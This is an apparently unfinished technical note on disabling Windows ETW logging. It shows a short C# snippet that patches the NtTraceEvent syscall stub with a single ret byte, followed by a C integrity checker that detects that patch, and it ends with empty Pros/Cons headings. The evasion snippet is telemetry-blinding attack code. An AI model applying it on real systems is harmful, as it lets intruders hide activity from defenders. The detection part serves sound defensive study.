Untitled

The API call chain is on the left

There are two techniques, the classic patch, and a more granular one.

The patch

Credit to whiteknightlabs + xpn

Since the call chain goes ReportEventW ⇒ EtwEventWrite ⇒ NtTraceEvent, we can patch the Nt function at the bottom of it. x64 Nt syscall stubs in ntdll look like this:

4C 8B D1                      mov     r10, rcx
B8 ?? ?? ?? ??                mov     eax, ??
0F 05                         syscall
C3                            retn

We can overwrite the first byte with 0xC3, i.e. a return instruction, so the stub returns immediately instead of issuing the syscall:

byte[] patch = new byte[] {0xc3};                                          // 0xC3 = ret
uint oldProt;
VirtualProtect(pNtTraceEvent, (UIntPtr)1, (uint)0x40, out oldProt);        // 0x40 = PAGE_EXECUTE_READWRITE (rwx)
Marshal.Copy(patch, 0, pNtTraceEvent, 1);                                  // write the single-byte patch over "mov r10, rcx"
VirtualProtect(pNtTraceEvent, (UIntPtr)1, (uint)0x20, out oldProt);        // 0x20 = PAGE_EXECUTE_READ (rx), restore a sane protection

Changing the protection to RW (0x04) first instead of RWX makes the program crash, presumably because another thread can call into NtTraceEvent while the page is non-executable.
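From the defender's side, the patch above is easy to spot because it destroys the fixed stub prologue (4C 8B D1 B8 ...). The following is an added example, not code from this page, whiteknightlabs or xpn: a small integrity check that classifies the first bytes of an Nt stub as intact, ret-patched, or otherwise modified, and extracts the syscall number when the stub is intact. It assumes the x64 stub shape shown above; the sample buffers and their syscall number 0x11 are constructed placeholders, not the real NtTraceEvent bytes. On Windows it additionally reads the live NtTraceEvent export from the current process's ntdll.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Verdict for the first bytes of an x64 Nt* syscall stub. */
typedef enum {
    STUB_TOO_SHORT = 0,   /* not enough bytes to judge */
    STUB_INTACT,          /* 4C 8B D1 B8 nn nn nn nn : mov r10,rcx ; mov eax,<syscall no> */
    STUB_PATCHED_RET,     /* first byte is C3: the ret patch described above */
    STUB_MODIFIED         /* prologue differs in some other way (hook, other patch) */
} stub_verdict;

/* Expected prologue of an x64 ntdll syscall stub: mov r10,rcx ; mov eax,imm32 */
static const unsigned char NT_STUB_PROLOGUE[] = { 0x4C, 0x8B, 0xD1, 0xB8 };
#define NT_STUB_MIN_LEN 8   /* 4-byte prologue + 4-byte syscall number */

/* Classify `len` bytes read from a stub's export address. */
stub_verdict check_nt_stub(const unsigned char *code, size_t len)
{
    if (code == NULL || len < NT_STUB_MIN_LEN) return STUB_TOO_SHORT;
    if (memcmp(code, NT_STUB_PROLOGUE, sizeof NT_STUB_PROLOGUE) == 0) return STUB_INTACT;
    if (code[0] == 0xC3) return STUB_PATCHED_RET;
    return STUB_MODIFIED;
}

/* Syscall number carried by an intact stub (little-endian imm32 after 0xB8); 0 if not intact. */
uint32_t nt_stub_syscall_number(const unsigned char *code, size_t len)
{
    if (check_nt_stub(code, len) != STUB_INTACT) return 0;
    return (uint32_t)code[4] | ((uint32_t)code[5] << 8) |
           ((uint32_t)code[6] << 16) | ((uint32_t)code[7] << 24);
}

/* Constructed sample stubs for offline testing; 0x11 is a placeholder syscall number. */
const unsigned char SAMPLE_INTACT[]  = { 0x4C,0x8B,0xD1, 0xB8,0x11,0x00,0x00,0x00, 0x0F,0x05, 0xC3 };
const unsigned char SAMPLE_PATCHED[] = { 0xC3,0x8B,0xD1, 0xB8,0x11,0x00,0x00,0x00, 0x0F,0x05, 0xC3 };

static const char *verdict_name(stub_verdict v)
{
    switch (v) {
    case STUB_INTACT:      return "intact";
    case STUB_PATCHED_RET: return "PATCHED (ret at entry)";
    case STUB_MODIFIED:    return "MODIFIED (unexpected prologue)";
    default:               return "too short";
    }
}

#ifdef _WIN32
#include <windows.h>
/* On Windows: inspect the live NtTraceEvent export of this process's ntdll. */
static stub_verdict check_live_nttraceevent(void)
{
    HMODULE ntdll = GetModuleHandleA("ntdll.dll");
    FARPROC fn = ntdll ? GetProcAddress(ntdll, "NtTraceEvent") : NULL;
    if (fn == NULL) return STUB_TOO_SHORT;
    return check_nt_stub((const unsigned char *)fn, NT_STUB_MIN_LEN);
}
#endif

int main(void)
{
    printf("constructed intact stub : %s (syscall 0x%x)\n",
           verdict_name(check_nt_stub(SAMPLE_INTACT, sizeof SAMPLE_INTACT)),
           nt_stub_syscall_number(SAMPLE_INTACT, sizeof SAMPLE_INTACT));
    printf("constructed patched stub: %s\n",
           verdict_name(check_nt_stub(SAMPLE_PATCHED, sizeof SAMPLE_PATCHED)));
#ifdef _WIN32
    printf("live NtTraceEvent       : %s\n", verdict_name(check_live_nttraceevent()));
#endif
    return 0;
}
```

The check only covers the four prologue bytes the patch overwrites; comparing the whole stub against the on-disk ntdll image, or checking every Nt* export rather than just NtTraceEvent, is the natural extension for an EDR-style scan.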

Pros

Cons